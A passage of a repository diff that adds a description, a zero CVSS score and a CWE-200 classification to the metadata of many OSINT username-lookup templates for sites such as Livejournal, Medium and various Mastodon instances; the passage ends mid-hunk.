b/osint/litmindclub-mastodon-instance.yaml @@ -3,7 +3,12 @@ id: litmindclub-mastodon-instance info: name: Litmind.club (Mastodon Instance) author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,litmindclub-mastodon-instance self-contained: true diff --git a/osint/livejournal.yaml b/osint/livejournal.yaml index 42da2cd161..3be208cfbc 100644 --- a/osint/livejournal.yaml +++ b/osint/livejournal.yaml @@ -3,7 +3,12 @@ id: livejournal info: name: Livejournal author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-blog,livejournal self-contained: true diff --git a/osint/livemasterru.yaml b/osint/livemasterru.yaml index d0cd5e792f..07f625a1ae 100644 --- a/osint/livemasterru.yaml +++ b/osint/livemasterru.yaml @@ -3,7 +3,12 @@ id: livemasterru info: name: livemaster.ru author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-shopping,livemasterru self-contained: true diff --git a/osint/lobsters.yaml b/osint/lobsters.yaml index 8d130b322b..46432ca466 100644 --- a/osint/lobsters.yaml +++ b/osint/lobsters.yaml @@ -3,7 +3,12 @@ id: lobsters info: name: lobste.rs author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-tech,lobsters self-contained: true diff --git a/osint/lorsh-mastodon-instance.yaml b/osint/lorsh-mastodon-instance.yaml index 22cccc6355..08e0fc74ac 100644 --- a/osint/lorsh-mastodon-instance.yaml +++ b/osint/lorsh-mastodon-instance.yaml @@ -3,7 +3,12 @@ id: lorsh-mastodon-instance info: name: Lor.sh (Mastodon Instance) author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,lorsh-mastodon-instance self-contained: true diff --git a/osint/love-ru.yaml b/osint/love-ru.yaml index 63bf28a952..2f15a06959 100644 --- a/osint/love-ru.yaml +++ b/osint/love-ru.yaml @@ -3,7 +3,12 @@ id: love-ru info: name: love_ru author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,love-ru self-contained: true diff --git a/osint/lowcygierpl.yaml b/osint/lowcygierpl.yaml index a380fe1c94..563c07a761 100644 --- a/osint/lowcygierpl.yaml +++ b/osint/lowcygierpl.yaml @@ -3,7 +3,12 @@ id: lowcygierpl info: name: lowcygier.pl author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,lowcygierpl self-contained: true diff --git a/osint/maga-chat.yaml b/osint/maga-chat.yaml index 075bf06f87..7c873bbcbc 100644 --- a/osint/maga-chat.yaml +++ b/osint/maga-chat.yaml @@ -3,7 +3,12 @@ id: maga-chat info: name: MAGA-CHAT author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,maga-chat self-contained: true diff --git a/osint/magabook.yaml b/osint/magabook.yaml index 301fefd10d..8000649e8f 100644 --- a/osint/magabook.yaml +++ b/osint/magabook.yaml @@ -3,7 +3,12 @@ id: magabook info: name: MAGABOOK author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,magabook self-contained: true diff --git a/osint/magix.yaml b/osint/magix.yaml index cf1086bf4c..285fc90cc3 100644 --- a/osint/magix.yaml +++ b/osint/magix.yaml @@ -3,7 +3,12 @@ id: magix info: name: Magix author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-music,magix self-contained: true diff --git a/osint/manyvids.yaml b/osint/manyvids.yaml index 125db9b24b..486f23d4da 100644 --- a/osint/manyvids.yaml +++ b/osint/manyvids.yaml @@ -3,7 +3,12 @@ id: manyvids info: name: MANYVIDS author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-porn,manyvids self-contained: true diff --git a/osint/mapmytracks.yaml b/osint/mapmytracks.yaml index 6cf0770d2c..f9558a493c 100644 --- a/osint/mapmytracks.yaml +++ b/osint/mapmytracks.yaml @@ -3,7 +3,12 @@ id: mapmytracks info: name: MapMyTracks author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-health,mapmytracks self-contained: true diff --git a/osint/mapstodonspace-mastodon-instance.yaml b/osint/mapstodonspace-mastodon-instance.yaml index be39d6bc5b..905609349c 100644 --- a/osint/mapstodonspace-mastodon-instance.yaml +++ b/osint/mapstodonspace-mastodon-instance.yaml @@ -3,7 +3,12 @@ id: mapstodonspace-mastodon-instance info: name: Mapstodon.space (Mastodon Instance) author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,mapstodonspace-mastodon-instance self-contained: true diff --git a/osint/maroc-nl.yaml b/osint/maroc-nl.yaml index 7bba9f3c32..2c15710888 100644 --- a/osint/maroc-nl.yaml +++ b/osint/maroc-nl.yaml @@ -3,7 +3,12 @@ id: maroc-nl info: name: Maroc_nl author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,maroc-nl self-contained: true diff --git a/osint/marshmallow.yaml b/osint/marshmallow.yaml index 5910f37cca..29ebac0e33 100644 --- a/osint/marshmallow.yaml +++ b/osint/marshmallow.yaml @@ -3,7 +3,12 @@ id: marshmallow info: name: Marshmallow author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,marshmallow self-contained: true diff --git a/osint/martech.yaml b/osint/martech.yaml index 5cda931b8c..03f9453cca 100644 --- a/osint/martech.yaml +++ b/osint/martech.yaml @@ -3,7 +3,12 @@ id: martech info: name: Martech author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-business,martech self-contained: true diff --git a/osint/massage-anywhere.yaml b/osint/massage-anywhere.yaml index 621e96c625..69c28e2cba 100644 --- a/osint/massage-anywhere.yaml +++ b/osint/massage-anywhere.yaml @@ -3,7 +3,12 @@ id: massage-anywhere info: name: Massage Anywhere author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-health,massage-anywhere self-contained: true diff --git a/osint/mastoai.yaml b/osint/mastoai.yaml index 2746f1f528..f2950e5540 100644 --- a/osint/mastoai.yaml +++ b/osint/mastoai.yaml @@ -3,7 +3,12 @@ id: mastoai info: name: masto.ai author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,mastoai self-contained: true diff --git a/osint/mastodon-101010pl.yaml b/osint/mastodon-101010pl.yaml index 2ccdd07399..2d5eec6dd1 100644 --- a/osint/mastodon-101010pl.yaml +++ b/osint/mastodon-101010pl.yaml @@ -3,7 +3,12 @@ id: mastodon-101010pl info: name: Mastodon-101010.pl author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,mastodon-101010pl self-contained: true diff --git a/osint/mastodon-api.yaml b/osint/mastodon-api.yaml index bf508e5ec8..dab8dc9a3a 100644 --- a/osint/mastodon-api.yaml +++ b/osint/mastodon-api.yaml @@ -3,7 +3,12 @@ id: mastodon-api info: name: Mastodon-API author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,mastodon-api self-contained: true diff --git a/osint/mastodon-chaossocial.yaml b/osint/mastodon-chaossocial.yaml index 82eed3a2ee..bfe54ec96b 100644 --- a/osint/mastodon-chaossocial.yaml +++ b/osint/mastodon-chaossocial.yaml @@ -3,7 +3,12 @@ id: mastodon-chaossocial info: name: Mastodon-Chaos.social author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,mastodon-chaossocial self-contained: true diff --git a/osint/mastodon-climatejusticerocks.yaml b/osint/mastodon-climatejusticerocks.yaml index 65142e4be8..e07a537f8a 100644 --- a/osint/mastodon-climatejusticerocks.yaml +++ b/osint/mastodon-climatejusticerocks.yaml @@ -3,7 +3,12 @@ id: mastodon-climatejusticerocks info: name: Mastodon-climatejustice.rocks author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,mastodon-climatejusticerocks self-contained: true diff --git a/osint/mastodon-countersocial.yaml b/osint/mastodon-countersocial.yaml index d4c1488032..fe621dfd7f 100644 --- a/osint/mastodon-countersocial.yaml +++ b/osint/mastodon-countersocial.yaml @@ -3,7 +3,12 @@ id: mastodon-countersocial info: name: Mastodon-counter.social author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,mastodon-countersocial self-contained: true diff --git a/osint/mastodon-defcon.yaml b/osint/mastodon-defcon.yaml index bd33b78c2b..4c04418672 100644 --- a/osint/mastodon-defcon.yaml +++ b/osint/mastodon-defcon.yaml @@ -3,7 +3,12 @@ id: mastodon-defcon info: name: Mastodon-Defcon author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,mastodon-defcon self-contained: true diff --git a/osint/mastodon-eu-voice.yaml b/osint/mastodon-eu-voice.yaml index a01535cacb..f799885dd1 100644 --- a/osint/mastodon-eu-voice.yaml +++ b/osint/mastodon-eu-voice.yaml @@ -3,7 +3,12 @@ id: mastodon-eu-voice info: name: Mastodon-EU_Voice author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,mastodon-eu-voice self-contained: true diff --git a/osint/mastodon-mastodon.yaml b/osint/mastodon-mastodon.yaml index 0aa4aac68f..460976d256 100644 --- a/osint/mastodon-mastodon.yaml +++ b/osint/mastodon-mastodon.yaml @@ -3,7 +3,12 @@ id: mastodon-mastodon info: name: Mastodon-mastodon author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,mastodon-mastodon self-contained: true diff --git a/osint/mastodon-meowsocial.yaml b/osint/mastodon-meowsocial.yaml index c43dd6ad91..7d17255c0c 100644 --- a/osint/mastodon-meowsocial.yaml +++ b/osint/mastodon-meowsocial.yaml @@ -3,7 +3,12 @@ id: mastodon-meowsocial info: name: Mastodon-meow.social author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,mastodon-meowsocial self-contained: true diff --git a/osint/mastodon-mstdnio.yaml b/osint/mastodon-mstdnio.yaml index 1b08de3b3b..2c82a02a93 100644 --- a/osint/mastodon-mstdnio.yaml +++ b/osint/mastodon-mstdnio.yaml @@ -3,7 +3,12 @@ id: mastodon-mstdnio info: name: Mastodon-mstdn.io author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,mastodon-mstdnio self-contained: true diff --git a/osint/mastodon-polsocial.yaml b/osint/mastodon-polsocial.yaml index 1173697431..e5a3d65645 100644 --- a/osint/mastodon-polsocial.yaml +++ b/osint/mastodon-polsocial.yaml @@ -3,7 +3,12 @@ id: mastodon-polsocial info: name: Mastodon-pol.social author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,mastodon-polsocial self-contained: true diff --git a/osint/mastodon-rigczclub.yaml b/osint/mastodon-rigczclub.yaml index 848b31d953..e328c8a0e6 100644 --- a/osint/mastodon-rigczclub.yaml +++ b/osint/mastodon-rigczclub.yaml @@ -3,7 +3,12 @@ id: mastodon-rigczclub info: name: Mastodon-rigcz.club author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,mastodon-rigczclub self-contained: true diff --git a/osint/mastodon-social-tchncs.yaml b/osint/mastodon-social-tchncs.yaml index c506e45ec5..1be8cebfe0 100644 --- a/osint/mastodon-social-tchncs.yaml +++ b/osint/mastodon-social-tchncs.yaml @@ -3,7 +3,12 @@ id: mastodon-social-tchncs info: name: Mastodon-social_tchncs author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,mastodon-social-tchncs self-contained: true diff --git a/osint/mastodon-tflnetpl.yaml b/osint/mastodon-tflnetpl.yaml index 88d31ebda1..c9587cbe3f 100644 --- a/osint/mastodon-tflnetpl.yaml +++ b/osint/mastodon-tflnetpl.yaml @@ -3,7 +3,12 @@ id: mastodon-tflnetpl info: name: Mastodon-tfl.net.pl author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,mastodon-tflnetpl self-contained: true diff --git a/osint/mastodon-tootcommunity.yaml b/osint/mastodon-tootcommunity.yaml index 4aa568937e..b3b3e10095 100644 --- a/osint/mastodon-tootcommunity.yaml +++ b/osint/mastodon-tootcommunity.yaml @@ -3,7 +3,12 @@ id: mastodon-tootcommunity info: name: Mastodon-Toot.Community author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,mastodon-tootcommunity self-contained: true diff --git a/osint/mastodonbooksnet-mastodon-instance.yaml b/osint/mastodonbooksnet-mastodon-instance.yaml index ed3a1f490f..f898afcb68 100644 --- a/osint/mastodonbooksnet-mastodon-instance.yaml +++ b/osint/mastodonbooksnet-mastodon-instance.yaml @@ -3,7 +3,12 @@ id: mastodonbooksnet-mastodon-instance info: name: Mastodonbooks.net (Mastodon Instance) author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,mastodonbooksnet-mastodon-instance self-contained: true diff --git a/osint/mastodonchasedemdev-mastodon-instance.yaml b/osint/mastodonchasedemdev-mastodon-instance.yaml index e8c122b48b..f2547d62b8 100644 --- a/osint/mastodonchasedemdev-mastodon-instance.yaml +++ b/osint/mastodonchasedemdev-mastodon-instance.yaml @@ -3,7 +3,12 @@ id: mastodonchasedemdev-mastodon-instance info: name: Mastodon.chasedem.dev (Mastodon Instance) author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,mastodonchasedemdev-mastodon-instance self-contained: true diff --git a/osint/mastodononline.yaml b/osint/mastodononline.yaml index 4f11469b01..0b8cdbda21 100644 --- a/osint/mastodononline.yaml +++ b/osint/mastodononline.yaml @@ -3,7 +3,12 @@ id: mastodononline info: name: Mastodon.online author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,mastodononline self-contained: true diff --git a/osint/mastonyc-mastodon-instance.yaml b/osint/mastonyc-mastodon-instance.yaml index 129545a477..ffd86f6bef 100644 --- a/osint/mastonyc-mastodon-instance.yaml +++ b/osint/mastonyc-mastodon-instance.yaml @@ -3,7 +3,12 @@ id: mastonyc-mastodon-instance info: name: Masto.nyc (Mastodon Instance) author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,mastonyc-mastodon-instance self-contained: true diff --git a/osint/mastown-mastodon-instance.yaml b/osint/mastown-mastodon-instance.yaml index e57f90406b..88ba186aa1 100644 --- a/osint/mastown-mastodon-instance.yaml +++ b/osint/mastown-mastodon-instance.yaml @@ -3,7 +3,12 @@ id: mastown-mastodon-instance info: name: Mas.town (Mastodon Instance) author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,mastown-mastodon-instance self-contained: true diff --git a/osint/mcname-minecraft.yaml b/osint/mcname-minecraft.yaml index 8706c37d22..6bc67a2373 100644 --- a/osint/mcname-minecraft.yaml +++ b/osint/mcname-minecraft.yaml @@ -3,7 +3,12 @@ id: mcname-minecraft info: name: MCName (Minecraft) author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,mcname-minecraft self-contained: true diff --git a/osint/mcuuid-minecraft.yaml b/osint/mcuuid-minecraft.yaml index 3580a01a7a..2673e17b0d 100644 --- a/osint/mcuuid-minecraft.yaml +++ b/osint/mcuuid-minecraft.yaml @@ -3,7 +3,12 @@ id: mcuuid-minecraft info: name: MCUUID (Minecraft) author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,mcuuid-minecraft self-contained: true diff --git a/osint/mediakits.yaml b/osint/mediakits.yaml index ff99c1551d..4ef119a7c8 100644 --- a/osint/mediakits.yaml +++ b/osint/mediakits.yaml @@ -3,7 +3,12 @@ id: mediakits info: name: Mediakits author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,mediakits self-contained: true diff --git a/osint/medium.yaml b/osint/medium.yaml index 9565baeeb0..ec44ee6312 100644 --- a/osint/medium.yaml +++ b/osint/medium.yaml @@ -3,7 +3,12 @@ id: medium info: name: Medium author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-news,medium self-contained: true diff --git a/osint/medyczkapl.yaml b/osint/medyczkapl.yaml index 6a3e6daa33..a7d1a80e8a 100644 --- a/osint/medyczkapl.yaml +++ b/osint/medyczkapl.yaml @@ -3,7 +3,12 @@ id: medyczkapl info: name: medyczka.pl author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-health,medyczkapl self-contained: true diff --git a/osint/meet-me.yaml b/osint/meet-me.yaml index 727180748b..49ab76a5e6 100644 --- a/osint/meet-me.yaml +++ b/osint/meet-me.yaml @@ -3,7 +3,12 @@ id: meet-me info: name: meet me author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-dating,meet-me self-contained: true diff --git a/osint/megamodelspl.yaml b/osint/megamodelspl.yaml index 363d4aa42a..a0b8899266 100644 --- a/osint/megamodelspl.yaml +++ b/osint/megamodelspl.yaml @@ -3,7 +3,12 @@ id: megamodelspl info: name: megamodels.pl author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,megamodelspl self-contained: true diff --git a/osint/memrise.yaml b/osint/memrise.yaml index ce8a3a5566..82cedf50e1 100644 --- a/osint/memrise.yaml +++ b/osint/memrise.yaml @@ -3,7 +3,12 @@ id: memrise info: name: memrise author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-hobby,memrise self-contained: true diff --git a/osint/message-me.yaml b/osint/message-me.yaml index 9b23556343..c53e6bc639 100644 --- a/osint/message-me.yaml +++ b/osint/message-me.yaml @@ -3,7 +3,12 @@ id: message-me info: name: message_me author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,message-me self-contained: true diff --git a/osint/metacritic.yaml b/osint/metacritic.yaml index 4a5562fb29..08d95d89a3 100644 --- a/osint/metacritic.yaml +++ b/osint/metacritic.yaml @@ -3,7 +3,12 @@ id: metacritic info: name: metacritic author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-hobby,metacritic self-contained: true diff --git a/osint/microsoft-technet-community.yaml b/osint/microsoft-technet-community.yaml index 0ea3904aa0..f6ceab80c0 100644 --- a/osint/microsoft-technet-community.yaml +++ b/osint/microsoft-technet-community.yaml @@ -3,7 +3,12 @@ id: microsoft-technet-community info: name: Microsoft Technet Community author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-tech,microsoft-technet-community self-contained: true diff --git a/osint/minds.yaml b/osint/minds.yaml index 0c0660d1ed..1cb8139b02 100644 --- a/osint/minds.yaml +++ b/osint/minds.yaml @@ -3,7 +3,12 @@ id: minds info: name: Minds author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-political,minds self-contained: true diff --git a/osint/minecraft-list.yaml b/osint/minecraft-list.yaml index f5a07a447c..be7d872b81 100644 --- a/osint/minecraft-list.yaml +++ b/osint/minecraft-list.yaml @@ -3,7 +3,12 @@ id: minecraft-list info: name: Minecraft List author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,minecraft-list self-contained: true diff --git a/osint/mintme.yaml b/osint/mintme.yaml index ffa46ca707..bfe77fec49 100644 --- a/osint/mintme.yaml +++ b/osint/mintme.yaml @@ -3,7 +3,12 @@ id: mintme info: name: mintme author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-finance,mintme self-contained: true diff --git a/osint/mistrzowie.yaml b/osint/mistrzowie.yaml index 1c1a869353..02faa0e4ba 100644 --- a/osint/mistrzowie.yaml +++ b/osint/mistrzowie.yaml @@ -3,7 +3,12 @@ id: mistrzowie info: name: Mistrzowie author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-images,mistrzowie self-contained: true diff --git a/osint/mix.yaml b/osint/mix.yaml index 1619bff05f..1f855d7a78 100644 --- a/osint/mix.yaml +++ b/osint/mix.yaml @@ -3,7 +3,12 @@ id: mix info: name: Mix author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,mix self-contained: true diff --git a/osint/mixi.yaml b/osint/mixi.yaml index 710975ee33..49f563787d 100644 --- a/osint/mixi.yaml +++ b/osint/mixi.yaml @@ -3,7 +3,12 @@ id: mixi info: name: Mixi author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,mixi self-contained: true diff --git a/osint/mixlr.yaml b/osint/mixlr.yaml index e7f5df01a4..da264d3332 100644 --- a/osint/mixlr.yaml +++ b/osint/mixlr.yaml @@ -3,7 +3,12 @@ id: mixlr info: name: Mixlr author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: 